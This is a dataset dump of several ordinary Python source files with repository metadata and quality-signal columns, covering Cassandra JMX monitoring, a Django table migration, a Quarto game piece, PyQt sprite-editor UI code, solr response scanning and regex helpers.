hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5a7fe776654c20e1290bc4e948072b1dcc063b7e | 2,007 | py | Python | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 3 | 2019-10-23T01:10:19.000Z | 2022-03-26T18:40:44.000Z | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 23 | 2018-12-05T20:30:04.000Z | 2020-11-11T19:20:57.000Z | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 3 | 2019-02-11T20:40:41.000Z | 2022-03-26T18:40:50.000Z | #!/usr/bin/env python3
"""
Code to issue calls to the cassandra MX4J http server and get stats.
"""
import os
import sys
from optparse import OptionParser
from esmond.api.client.jmx import CassandraJMX
def main():
    """Query the cassandra MX4J HTTP server and print the collected stats.

    Parses -U/--url (mx4j endpoint) and -v (verbosity, currently unused),
    then prints one labelled line per JMX statistic.
    """
    usage = '%prog [ -U ]'
    parser = OptionParser(usage=usage)
    parser.add_option('-U', '--url', metavar='URL',
        type='string', dest='url', default='http://localhost:8081',
        help='URL:port to cassandra mx4j server (default=%default).')
    # A 'count' action should start from the integer 0, not False, so that
    # -v/-vv yield proper verbosity levels (the original default=False was
    # type-confused even though incrementing a bool happens to work).
    parser.add_option('-v', '--verbose',
        dest='verbose', action='count', default=0,
        help='Verbose output - -v, -vv, etc.')
    options, _ = parser.parse_args()

    cjmx = CassandraJMX(options.url)

    # (label, getter) pairs keep the report order stable and make adding a
    # new statistic a one-line change instead of another print statement.
    stats = (
        ('Heap mem:', cjmx.get_heap_memory),
        ('Non-heap mem:', cjmx.get_non_heap_memory),
        ('Read latency:', cjmx.get_read_latency),
        ('Write latency:', cjmx.get_write_latency),
        ('Range latency:', cjmx.get_range_latency),
        ('GC count:', cjmx.get_gc_count),
        ('GC time:', cjmx.get_gc_time),
        ('Active read tasks:', cjmx.get_read_active),
        ('Pending read tasks:', cjmx.get_read_pending),
        ('Completed read tasks:', cjmx.get_read_completed),
        ('Active write tasks:', cjmx.get_write_active),
        ('Pending write tasks:', cjmx.get_write_pending),
        ('Completed write tasks:', cjmx.get_write_completed),
        ('Active gossip tasks:', cjmx.get_gossip_active),
        ('Pending gossip tasks:', cjmx.get_gossip_pending),
        ('Completed gossip tasks:', cjmx.get_gossip_completed),
        ('OS load:', cjmx.get_os_load),
        ('OS free mem:', cjmx.get_os_free_memory),
        ('OS free swap:', cjmx.get_os_free_swap),
        ('OS committed virtual mem:', cjmx.get_os_committed_virtual_memory),
        ('Pending compaction', cjmx.get_compaction_pending),
        ('Completed compaction', cjmx.get_compaction_complete),
    )
    for label, getter in stats:
        print(label, getter())
if __name__ == '__main__':
    main()
| 38.596154 | 78 | 0.678127 | 268 | 2,007 | 4.854478 | 0.30597 | 0.11837 | 0.083013 | 0.036895 | 0.152191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004179 | 0.165421 | 2,007 | 51 | 79 | 39.352941 | 0.772537 | 0.044843 | 0 | 0 | 0 | 0 | 0.275013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.102564 | 0 | 0.128205 | 0.564103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
5a8074c85da0b1531e270b6b0eaa82126e705010 | 1,294 | py | Python | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | from django.core.management.base import BaseCommand
from django.db import connection
class Command(BaseCommand):
    help = "Add missing id column for hostingstats."

    def handle(self, *args, **options):
        """Rebuild `hostingproviders_stats` with an auto-increment `id` PK.

        Copies the existing rows into a replacement table that has a
        surrogate primary key, then swaps the new table in under the
        original name.

        NOTE(review): MySQL implicitly commits around DDL statements, so
        the START TRANSACTION/COMMIT pair cannot make the whole rebuild
        atomic; it is retained to cover the non-DDL INSERT step.
        """
        # Statements are executed one at a time: the default MySQL cursor
        # rejects multi-statement strings, and the original '-----'
        # separator line was not valid MySQL comment syntax (a `--`
        # comment requires a following whitespace character).
        statements = [
            "START TRANSACTION;",
            """
            CREATE TABLE `hostingproviders_stats_copy` (
                `id` INT(11) primary key Not null auto_increment,
                `id_hp` Int( 11 ) NOT NULL,
                `green_checks` Int( 11 ) NOT NULL,
                `green_domains` Int( 11 ) NOT NULL,
                CONSTRAINT `id_hp` UNIQUE( `id_hp` ) )
            CHARACTER SET = latin1
            COLLATE = latin1_swedish_ci
            ENGINE = InnoDB;
            """,
            """
            INSERT into hostingproviders_stats_copy(id_hp, green_checks, green_domains)
            SELECT id_hp, green_checks, green_domains FROM hostingproviders_stats;
            """,
            "DROP table hostingproviders_stats;",
            "ALTER table hostingproviders_stats_copy rename to hostingproviders_stats;",
            "COMMIT;",
        ]
        with connection.cursor() as cursor:
            self.cursor = cursor  # kept for backwards compatibility
            for statement in statements:
                cursor.execute(statement)
| 38.058824 | 91 | 0.532457 | 122 | 1,294 | 5.459016 | 0.52459 | 0.189189 | 0.117117 | 0.054054 | 0.132132 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.358578 | 1,294 | 33 | 92 | 39.212121 | 0.790361 | 0 | 0 | 0 | 0 | 0 | 0.111429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5a81a24952b6eed80c202bd9ff7db7e295855534 | 2,088 | py | Python | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | class Piece(object):
def __init__(self,
is_tall: bool = True,
is_dark: bool = True,
is_square: bool = True,
is_solid: bool = True,
string: str = None):
if string:
self.is_tall = (string[0] == "1")
self.is_dark = (string[1] == "1")
self.is_square = (string[2] == "1")
self.is_solid = (string[3] == "1")
else:
self.is_tall = is_tall
self.is_dark = is_dark
self.is_square = is_square
self.is_solid = is_solid
def __str__(self):
return "{0}{1}{2}{3}".format(
'1' if self.is_tall else '0',
'1' if self.is_dark else '0',
'1' if self.is_square else '0',
'1' if self.is_solid else '0'
)
def __hash__(self):
res = 0
res += 1 if self.is_tall else 0
res += 2 if self.is_dark else 0
res += 4 if self.is_square else 0
res += 8 if self.is_solid else 0
return res
def __eq__(self, other_piece):
if not isinstance(other_piece, type(self)):
return False
return self.__hash__() == other_piece.__hash__()
def has_in_common_with(self, *other_pieces):
all_pieces_are_as_tall = True
all_pieces_are_as_dark = True
all_pieces_are_as_square = True
all_pieces_are_as_solid = True
for p in other_pieces:
if not(self.is_tall == p.is_tall):
all_pieces_are_as_tall = False
if not(self.is_dark == p.is_dark):
all_pieces_are_as_dark = False
if not(self.is_square == p.is_square):
all_pieces_are_as_square = False
if not(self.is_solid == p.is_solid):
all_pieces_are_as_solid = False
return (all_pieces_are_as_tall
or all_pieces_are_as_dark
or all_pieces_are_as_square
or all_pieces_are_as_solid)
# Module is import-only for now; no standalone entry point is defined.
if __name__ == "__main__":
    pass
| 32.625 | 56 | 0.531609 | 289 | 2,088 | 3.425606 | 0.16609 | 0.127273 | 0.145455 | 0.169697 | 0.442424 | 0.148485 | 0.036364 | 0 | 0 | 0 | 0 | 0.022256 | 0.375958 | 2,088 | 63 | 57 | 33.142857 | 0.737529 | 0 | 0 | 0 | 0 | 0 | 0.015326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.018182 | 0 | 0.018182 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5a898eeb8ca1914311a3bfe38f233e0ef651e459 | 497 | py | Python | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | 2 | 2019-12-05T11:46:48.000Z | 2022-03-09T00:11:06.000Z | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | null | null | null | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | null | null | null | import unittest
from model import node
class DummyNode(node.Node):
    """Minimal concrete Node used as a test fixture.

    Sets ``primary_id_prefix`` to ``'TEST'`` after delegating to the base
    constructor, so id handling in ``node.Node`` can be exercised without
    a real node type.
    """

    def __init__(self, ids: 'list[str]', names: 'list[str]'):
        super().__init__(ids, names)
        self.primary_id_prefix = 'TEST'
class TestMethods(unittest.TestCase):
    """Unit tests for the basic Node accessors via the DummyNode fixture."""

    def test_label(self):
        # The label is derived from the concrete class name.
        node_under_test = DummyNode([], [])
        self.assertEqual(node_under_test.label, 'DummyNode')

    def test_str(self):
        # The string form lists the ids and quoted names.
        node_under_test = DummyNode(['TEST:1'], ['test name'])
        expected = 'DummyNode={ids: [TEST:1], names: ["test name"]}'
        self.assertEqual(str(node_under_test), expected)
| 26.157895 | 83 | 0.615694 | 62 | 497 | 4.741935 | 0.403226 | 0.102041 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0.215292 | 497 | 18 | 84 | 27.611111 | 0.748718 | 0 | 0 | 0 | 0 | 0 | 0.150905 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.230769 | false | 0 | 0.153846 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce4d63008769bb7f26121f3ebe84e27bc4d39e53 | 7,853 | py | Python | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | 8 | 2015-02-03T20:23:49.000Z | 2022-02-15T07:51:05.000Z | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | null | null | null | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | 2 | 2017-02-13T18:04:00.000Z | 2020-08-24T03:21:37.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'direction_sprite_widget.ui'
#
# Created: Wed Jul 30 18:37:40 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Standard pyuic4 compatibility shims: fall back to plain-Python
# implementations when this sip/PyQt build does not expose QString or the
# UnicodeUTF8 encoding constant.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # QString is absent under sip API v2; strings are already unicode.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Build without UnicodeUTF8: translate without an encoding argument.
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_direction_sprite_widget(object):
    """Generated UI layout for the direction-sprite editor widget.

    Auto-generated by the PyQt4 UI code generator from
    ``direction_sprite_widget.ui`` (see the file header) — do not edit by
    hand; regenerate from the .ui file instead.
    """

    def setupUi(self, direction_sprite_widget):
        """Build the widget tree, geometry and object names."""
        # Root container and main vertical layout.
        direction_sprite_widget.setObjectName(_fromUtf8("direction_sprite_widget"))
        direction_sprite_widget.resize(566, 457)
        self.verticalLayoutWidget = QtGui.QWidget(direction_sprite_widget)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 561, 451))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.layout_main = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.layout_main.setMargin(5)
        self.layout_main.setObjectName(_fromUtf8("layout_main"))
        self.layout_sprite_info = QtGui.QHBoxLayout()
        self.layout_sprite_info.setMargin(2)
        self.layout_sprite_info.setObjectName(_fromUtf8("layout_sprite_info"))
        # "Sprite Information" group: name / width / height form fields.
        self.gb_sprite = QtGui.QGroupBox(self.verticalLayoutWidget)
        self.gb_sprite.setMinimumSize(QtCore.QSize(250, 110))
        self.gb_sprite.setObjectName(_fromUtf8("gb_sprite"))
        self.formLayoutWidget = QtGui.QWidget(self.gb_sprite)
        self.formLayoutWidget.setGeometry(QtCore.QRect(20, 20, 191, 74))
        self.formLayoutWidget.setObjectName(_fromUtf8("formLayoutWidget"))
        self.formLayout = QtGui.QFormLayout(self.formLayoutWidget)
        self.formLayout.setMargin(0)
        self.formLayout.setObjectName(_fromUtf8("formLayout"))
        self.lbl_name = QtGui.QLabel(self.formLayoutWidget)
        self.lbl_name.setObjectName(_fromUtf8("lbl_name"))
        self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.lbl_name)
        self.le_name = QtGui.QLineEdit(self.formLayoutWidget)
        self.le_name.setObjectName(_fromUtf8("le_name"))
        self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.le_name)
        self.lbl_width = QtGui.QLabel(self.formLayoutWidget)
        self.lbl_width.setObjectName(_fromUtf8("lbl_width"))
        self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_width)
        self.le_width = QtGui.QLineEdit(self.formLayoutWidget)
        self.le_width.setObjectName(_fromUtf8("le_width"))
        self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.le_width)
        self.lbl_height = QtGui.QLabel(self.formLayoutWidget)
        self.lbl_height.setObjectName(_fromUtf8("lbl_height"))
        self.formLayout.setWidget(2, QtGui.QFormLayout.LabelRole, self.lbl_height)
        self.le_height = QtGui.QLineEdit(self.formLayoutWidget)
        self.le_height.setObjectName(_fromUtf8("le_height"))
        self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.le_height)
        self.layout_sprite_info.addWidget(self.gb_sprite)
        # "Preview" group: animation preview label plus FPS spin box (15-150).
        self.gb_preview = QtGui.QGroupBox(self.verticalLayoutWidget)
        self.gb_preview.setMinimumSize(QtCore.QSize(120, 0))
        self.gb_preview.setObjectName(_fromUtf8("gb_preview"))
        self.horizontalLayoutWidget = QtGui.QWidget(self.gb_preview)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(10, 20, 121, 80))
        self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
        self.layout_preview = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
        self.layout_preview.setMargin(0)
        self.layout_preview.setObjectName(_fromUtf8("layout_preview"))
        self.lbl_preview = QtGui.QLabel(self.horizontalLayoutWidget)
        self.lbl_preview.setObjectName(_fromUtf8("lbl_preview"))
        self.layout_preview.addWidget(self.lbl_preview)
        self.sp_fps = QtGui.QSpinBox(self.horizontalLayoutWidget)
        self.sp_fps.setMinimumSize(QtCore.QSize(40, 20))
        self.sp_fps.setMaximumSize(QtCore.QSize(40, 20))
        self.sp_fps.setMinimum(15)
        self.sp_fps.setMaximum(150)
        self.sp_fps.setObjectName(_fromUtf8("sp_fps"))
        self.layout_preview.addWidget(self.sp_fps)
        self.layout_sprite_info.addWidget(self.gb_preview)
        # Button to append a new frame to the sprite.
        self.btn_add_frame = QtGui.QPushButton(self.verticalLayoutWidget)
        self.btn_add_frame.setMinimumSize(QtCore.QSize(120, 0))
        self.btn_add_frame.setObjectName(_fromUtf8("btn_add_frame"))
        self.layout_sprite_info.addWidget(self.btn_add_frame)
        self.layout_main.addLayout(self.layout_sprite_info)
        # Row with the frame-list label and the direction selector combo.
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.lbl_frames = QtGui.QLabel(self.verticalLayoutWidget)
        self.lbl_frames.setObjectName(_fromUtf8("lbl_frames"))
        self.horizontalLayout.addWidget(self.lbl_frames)
        self.formLayout_2 = QtGui.QFormLayout()
        self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
        self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
        self.cb_direction = QtGui.QComboBox(self.verticalLayoutWidget)
        self.cb_direction.setObjectName(_fromUtf8("cb_direction"))
        self.formLayout_2.setWidget(0, QtGui.QFormLayout.FieldRole, self.cb_direction)
        self.lbl_direction = QtGui.QLabel(self.verticalLayoutWidget)
        self.lbl_direction.setObjectName(_fromUtf8("lbl_direction"))
        self.formLayout_2.setWidget(0, QtGui.QFormLayout.LabelRole, self.lbl_direction)
        self.horizontalLayout.addLayout(self.formLayout_2)
        self.layout_main.addLayout(self.horizontalLayout)
        # Scrollable area holding the individual frame widgets.
        self.sa_frames = QtGui.QScrollArea(self.verticalLayoutWidget)
        self.sa_frames.setWidgetResizable(True)
        self.sa_frames.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignVCenter)
        self.sa_frames.setObjectName(_fromUtf8("sa_frames"))
        self.scrollAreaWidgetContents = QtGui.QWidget()
        self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 549, 289))
        self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
        self.sa_frames.setWidget(self.scrollAreaWidgetContents)
        self.layout_main.addWidget(self.sa_frames)
        # Apply translated captions and wire auto-connected slots by name.
        self.retranslateUi(direction_sprite_widget)
        QtCore.QMetaObject.connectSlotsByName(direction_sprite_widget)

    def retranslateUi(self, direction_sprite_widget):
        """Set all user-visible strings (window title, captions, button text)."""
        direction_sprite_widget.setWindowTitle(_translate("direction_sprite_widget", "Form", None))
        self.gb_sprite.setTitle(_translate("direction_sprite_widget", "Sprite Information", None))
        self.lbl_name.setText(_translate("direction_sprite_widget", "Name :", None))
        self.lbl_width.setText(_translate("direction_sprite_widget", "Width :", None))
        self.le_width.setText(_translate("direction_sprite_widget", "0", None))
        self.lbl_height.setText(_translate("direction_sprite_widget", "Height :", None))
        self.le_height.setText(_translate("direction_sprite_widget", "0", None))
        self.gb_preview.setTitle(_translate("direction_sprite_widget", "Preview", None))
        self.lbl_preview.setText(_translate("direction_sprite_widget", "P", None))
        self.btn_add_frame.setText(_translate("direction_sprite_widget", "Add a frame...", None))
        self.lbl_frames.setText(_translate("direction_sprite_widget", "Frame(s)", None))
        self.lbl_direction.setText(_translate("direction_sprite_widget", "Direction :", None))
| 58.17037 | 99 | 0.741118 | 879 | 7,853 | 6.375427 | 0.166098 | 0.09743 | 0.086188 | 0.06424 | 0.365096 | 0.274268 | 0.154889 | 0.063526 | 0.029265 | 0.029265 | 0 | 0.020574 | 0.152044 | 7,853 | 134 | 100 | 58.604478 | 0.820994 | 0.029033 | 0 | 0.05042 | 1 | 0 | 0.090861 | 0.045299 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042017 | false | 0 | 0.008403 | 0.02521 | 0.084034 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce53b07d3a1a59be1abb2c6bf2cf0cd25eb7f425 | 562 | py | Python | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | null | null | null | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | 1 | 2015-09-23T16:30:34.000Z | 2015-09-23T16:30:34.000Z | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | 1 | 2020-03-25T09:41:03.000Z | 2020-03-25T09:41:03.000Z | import os
import glob
import json
# Scan dumped solr response documents and report every document whose
# HTTP Content-Type header mentions "shockwave" (i.e. Flash content).
for f in glob.glob('/Users/sparky/Documents/solr_responses/solr_20150922_docs/*.json'):
    with open(f, 'r') as g:
        data = json.loads(g.read())
    headers = data.get('response_headers', [])
    if not headers:
        continue
    # Headers are raw "Name: value" strings; build a dict keyed by the
    # lower-cased header name so lookups are case-insensitive. Malformed
    # entries without a colon are skipped instead of raising ValueError.
    headers = dict(
        (k.strip().lower(), v.strip())
        for k, v in (h.split(':', 1) for h in headers if ':' in h)
    )
    content_type = headers.get('content-type', '')
    if content_type and 'shockwave' in content_type:
        # print() call replaces the Python 2 print statement so the script
        # runs under Python 3 with identical output.
        print(data.get('url'), content_type, data.get('tstamp'))
| 28.1 | 87 | 0.617438 | 81 | 562 | 4.185185 | 0.530864 | 0.162242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020737 | 0.227758 | 562 | 19 | 88 | 29.578947 | 0.760369 | 0 | 0 | 0 | 0 | 0 | 0.199288 | 0.113879 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.2 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce5f3e28692a3faeaa82556c686295cb266a77ee | 300 | py | Python | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | import re
def find_indices(pattern=None, text=None):
    """Return the start index of every match of *pattern* in *text*.

    Both arguments default to the module-level ``reg``/``content``
    globals, so existing zero-argument callers keep working while new
    callers can pass their own pattern and subject string.
    """
    pattern = reg if pattern is None else pattern
    text = content if text is None else text
    return [m.start(0) for m in re.finditer(pattern, text)]
def find_content(pattern=None, text=None):
    """Return all non-overlapping matches of *pattern* in *text*.

    Both arguments default to the module-level ``reg``/``content``
    globals, so existing zero-argument callers keep working while new
    callers can pass their own pattern and subject string.
    """
    pattern = reg if pattern is None else pattern
    text = content if text is None else text
    return re.findall(pattern, text)
if __name__ == "__main__":
    # Demo run against a small sample sentence.
    content = 'an example word:cat and word:dog'
    reg = r'word:\w'
    for outcome in (find_indices(), find_content()):
        print(outcome)
